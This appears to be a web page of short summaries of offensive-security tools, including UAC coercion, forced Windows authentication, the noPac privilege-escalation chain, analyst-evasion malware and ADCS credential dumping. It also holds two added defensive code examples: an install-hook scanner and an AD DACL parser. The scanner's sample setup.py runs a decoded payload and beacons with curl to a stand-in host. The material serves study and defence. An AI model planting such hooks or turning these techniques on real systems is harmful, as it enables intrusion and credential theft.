ForceAdmin : Create Infinite UAC Prompts Forcing A User To Run As Admin
ForceAdmin is a C# payload builder that creates infinite UAC pop-ups until the user allows the program to run elevated. The supplied commands are run via PowerShell calling cmd.exe and must use batch syntax. Why use it? Some users have UAC set to "Always notify", so the usual auto-elevation UAC bypass techniques do not work. However - this attack will force...
Coercer : A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine
Coercer is a Python script to automatically coerce a Windows server to authenticate to an arbitrary machine through 9 methods. Features: automatically detects open SMB pipes on the remote machine; calls, one by one, all the vulnerable RPC functions to coerce the server to authenticate to an arbitrary machine; an analyze mode (--analyze) that only lists the vulnerable protocols and functions listening, without performing...
noPac : Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User
noPac, exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from a standard domain user.
Usage:
SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain
positional arguments:
  username              Account used to authenticate to DC.
optional arguments:
  -h, --help            show this help message and exit
  --impersonate IMPERSONATE
                        target username that will be impersonated (through S4U2Self) for querying the ST. Keep in mind this will only work if the identity provided in this script is...
Aura : Python Source Code Auditing And Static Analysis On A Large Scale
Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI. Project goals: provide an automated monitoring system over packages uploaded to PyPI, alerting on anomalies that can indicate either an ongoing attack or vulnerabilities in the code; enable an organization to conduct automated security audits of the source code...
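The kind of anomaly such monitoring looks for is install-time code execution: a setup.py that hooks the install command, decodes a blob and runs it. The scanner below is an added example of that check using only the standard-library ast module; it is not Aura's own engine, and the sample setup.py it scans is constructed here for illustration.

```python
"""Flag install-time execution patterns in a Python package file with ast.
Added example (not Aura's own code); SAMPLE_SETUP_PY is constructed."""
import ast

# Fully qualified callables a benign setup.py has no reason to invoke.
SUSPICIOUS_CALLS = {
    "os.system", "subprocess.Popen", "subprocess.run", "subprocess.check_output",
    "base64.b64decode", "urllib.request.urlopen", "requests.get",
}
SUSPICIOUS_BUILTINS = {"exec", "eval", "compile", "__import__"}
# Base classes whose subclass run() executes during `pip install`.
INSTALL_HOOK_BASES = {
    "setuptools.command.install.install",
    "setuptools.command.develop.develop",
    "distutils.command.install.install",
}


class InstallHookScanner(ast.NodeVisitor):
    def __init__(self):
        self.findings = []   # (lineno, kind, qualified name)
        self.aliases = {}    # local name -> dotted name it refers to

    def visit_Import(self, node):
        for alias in node.names:
            if alias.asname:
                self.aliases[alias.asname] = alias.name
            else:  # `import urllib.request` binds the top-level name only
                top = alias.name.split(".")[0]
                self.aliases[top] = top
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        module = node.module or ""
        for alias in node.names:
            self.aliases[alias.asname or alias.name] = f"{module}.{alias.name}"
        self.generic_visit(node)

    def _qualname(self, node):
        """Resolve Name / dotted Attribute chains through the import aliases."""
        if isinstance(node, ast.Name):
            return self.aliases.get(node.id, node.id)
        if isinstance(node, ast.Attribute):
            base = self._qualname(node.value)
            return f"{base}.{node.attr}" if base else None
        return None

    def visit_ClassDef(self, node):
        for base in node.bases:
            name = self._qualname(base)
            if name in INSTALL_HOOK_BASES:
                self.findings.append((node.lineno, "install-hook", name))
        self.generic_visit(node)

    def visit_Call(self, node):
        name = self._qualname(node.func)
        if name in SUSPICIOUS_BUILTINS:
            self.findings.append((node.lineno, "dynamic-exec", name))
        elif name in SUSPICIOUS_CALLS:
            self.findings.append((node.lineno, "suspicious-call", name))
        self.generic_visit(node)  # catch nested calls such as exec(b64decode(...))


def scan_source(source):
    """Return sorted (lineno, kind, name) findings for one Python source file."""
    scanner = InstallHookScanner()
    scanner.visit(ast.parse(source))
    return sorted(scanner.findings)


# Constructed sample: a setup.py with a post-install hook that decodes and runs a payload.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import base64, os

class PostInstall(install):
    def run(self):
        install.run(self)
        payload = base64.b64decode("ZWNobyBwd25lZA==")
        exec(payload)
        os.system("curl http://example.invalid/beacon")

setup(name="totally-legit", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for lineno, kind, name in scan_source(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {kind}: {name}")
```

Alias tracking matters: `import subprocess as sp` followed by `sp.run(...)` and `from os import system as s` both resolve to the same dotted names the lists are keyed on, so a renamed import does not evade the check. A real monitor would also diff behaviour across versions and score string entropy, which this example leaves out.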
BeatRev : POC For Frustrating/Defeating Malware Analysts
BeatRev is a POC for frustrating/defeating malware analysts. The first time the malware runs on a victim it AES-encrypts the actual payload (an RDLL, i.e. a reflective DLL) using environmental data from that victim. Each subsequent time the malware is run it gathers that same environmental information, AES-decrypts the payload stored as a byte array within the malware, and runs it. If...
ApacheTomcatScanner : A Python Script To Scan For Apache Tomcat Server Vulnerabilities
ApacheTomcatScanner is a Python script to scan for Apache Tomcat server vulnerabilities. Features: multithreaded workers to search for Apache Tomcat servers; multiple target sources (retrieving a list of computers from a Windows domain through an LDAP query, reading targets line by line from a file, or reading individual targets (IP/DNS/CIDR) from the -tt/--target option); a custom list of ports to test; tests for /manager/html access and...
Aced : Tool to parse and resolve a single targeted Active Directory principal’s DACL
Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced identifies interesting inbound access-allowed privileges against the targeted account, resolves the SIDs of the inbound permissions, and presents that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally, which...
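What "parse and resolve a DACL" means at the byte level: walk the self-relative security descriptor stored in nTSecurityDescriptor, read each ACE's access mask and trustee SID, and map the dangerous bits to names. The code below is an added example of that walk (not Aced's own parser); the descriptor, the SID-to-name table standing in for LDAP lookups, and the hypothetical CORP domain SIDs are all constructed here. The User-Force-Change-Password GUID is the real well-known extended-right GUID.

```python
"""Walk a self-relative nTSecurityDescriptor and flag inbound ACEs with
takeover rights. Added example (not Aced's code); SAMPLE_SD and SID_MAP are
constructed for illustration."""
import struct
import uuid

# Access mask bits (MS-DTYP / MS-ADTS) that usually mean control of the object.
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
WRITE_DAC, WRITE_OWNER = 0x00040000, 0x00080000
DS_WRITE_PROP, DS_CONTROL_ACCESS = 0x00000020, 0x00000100
INTERESTING = {GENERIC_ALL: "GenericAll", GENERIC_WRITE: "GenericWrite",
               WRITE_DAC: "WriteDacl", WRITE_OWNER: "WriteOwner",
               DS_WRITE_PROP: "WriteProperty", DS_CONTROL_ACCESS: "ExtendedRight"}

ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE = 0x00, 0x05
ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x1, 0x2
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
FORCE_CHANGE_PASSWORD = uuid.UUID("00299570-246d-11d0-a768-00aa006e0529")  # real rightsGuid

# Hypothetical SID resolution table standing in for LDAP lookups.
SID_MAP = {"S-1-5-21-1111-2222-3333-1105": "CORP\\helpdesk",
           "S-1-5-21-1111-2222-3333-512": "CORP\\Domain Admins"}


def build_sid(text):
    """Encode 'S-1-5-21-...' as a binary SID (revision, count, 48-bit authority, subauths)."""
    parts = text.split("-")
    rev, auth, subs = int(parts[1]), int(parts[2]), [int(x) for x in parts[3:]]
    return (struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def parse_sid(buf, off):
    rev, count = struct.unpack_from("<BB", buf, off)
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)


def build_ace(ace_type, mask, sid_text, object_type=None):
    body = struct.pack("<I", mask)
    if ace_type == ACCESS_ALLOWED_OBJECT_ACE:
        body += struct.pack("<I", ACE_OBJECT_TYPE_PRESENT if object_type else 0)
        if object_type:
            body += object_type.bytes_le
    body += build_sid(sid_text)
    return struct.pack("<BBH", ace_type, 0, 4 + len(body)) + body  # ACE header: type, flags, size


def build_descriptor(aces):
    """Self-relative SD: 20-byte header, no owner/group/SACL, DACL right after the header."""
    acl_body = b"".join(aces)
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(acl_body), len(aces), 0) + acl_body
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def parse_dacl(sd):
    _rev, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _arev, _s1, _size, ace_count, _s2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, entries = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        (mask,) = struct.unpack_from("<I", sd, off + 4)
        pos, object_type = off + 8, None
        if ace_type == ACCESS_ALLOWED_OBJECT_ACE:
            (obj_flags,) = struct.unpack_from("<I", sd, pos)
            pos += 4
            if obj_flags & ACE_OBJECT_TYPE_PRESENT:
                object_type = uuid.UUID(bytes_le=sd[pos:pos + 16])
                pos += 16
            if obj_flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
                pos += 16
        sid = parse_sid(sd, pos) if ace_type in (ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE) else None
        entries.append({"type": ace_type, "mask": mask, "sid": sid, "object_type": object_type})
        off += ace_size  # always advance by AceSize, never by what we happened to parse
    return entries


def interesting_inbound(sd, sid_map=SID_MAP):
    """Return (resolved trustee, rights) for every allow ACE carrying a takeover right."""
    findings = []
    for ace in parse_dacl(sd):
        if ace["sid"] is None:
            continue
        rights = [name for bit, name in INTERESTING.items() if ace["mask"] & bit]
        if not rights:
            continue
        text = ",".join(rights)
        if ace["object_type"] == FORCE_CHANGE_PASSWORD:
            text += " (User-Force-Change-Password)"
        findings.append((sid_map.get(ace["sid"], ace["sid"]), text))
    return findings


# Constructed DACL: helpdesk may force a password reset, Domain Admins have GenericAll,
# Authenticated Users only have DS_READ_PROP (0x10) and are not reported.
SAMPLE_SD = build_descriptor([
    build_ace(ACCESS_ALLOWED_OBJECT_ACE, DS_CONTROL_ACCESS,
              "S-1-5-21-1111-2222-3333-1105", FORCE_CHANGE_PASSWORD),
    build_ace(ACCESS_ALLOWED_ACE, GENERIC_ALL, "S-1-5-21-1111-2222-3333-512"),
    build_ace(ACCESS_ALLOWED_ACE, 0x00000010, "S-1-5-11"),
])

if __name__ == "__main__":
    for who, rights in interesting_inbound(SAMPLE_SD):
        print(f"{who}: {rights}")
```

Against a live directory the blob comes from the nTSecurityDescriptor attribute (requesting it with the LDAP_SERVER_SD_FLAGS control set to the DACL only avoids needing rights to read the SACL), and the SID table is filled by resolving each objectSid. Object ACEs must be stepped by AceSize rather than by the fields read, since the optional GUIDs change the SID offset.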
Erlik : Vulnerable Soap Service
Erlik is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.
Features: it contains the following vulnerabilities: LFI, SQL Injection, Information Disclosure, Command Injection, Brute Force, Deserialization.
Installation:
git clone https://github.com/anil-yelken/Vulnerable-Soap-Service
cd Vulnerable-Soap-Service
sudo pip3 install -r requirements.txt
Usage:
sudo python3 vulnerable_soap.py
Exploiting Vulnerabilities: SQL Injection code: https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py
Masky : Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS
Masky is a Python library providing an alternative way to remotely dump domain users' credentials via an ADCS (Active Directory Certificate Services). A command line tool has been built on top of this library in order to easily gather PFX files, NT hashes and TGTs across a larger scope. This tool does not exploit any new vulnerability and does not work by dumping the...
Awesome-Password-Cracking : A Curated List Of Awesome Tools, Research, Papers And Other Projects
Awesome-Password-Cracking is a curated list of awesome tools, research, papers and other projects related to password cracking and password security. Read the guidelines before contributing! In short: the list is alphabetically sorted; if in doubt, use awesome-lint; if you think an item shouldn't be here, open an issue. Books: Hash Crack: Password Cracking Manual (v3) - Password Cracking Manual v3 is an expanded reference guide for password recovery (cracking) methods, tools,...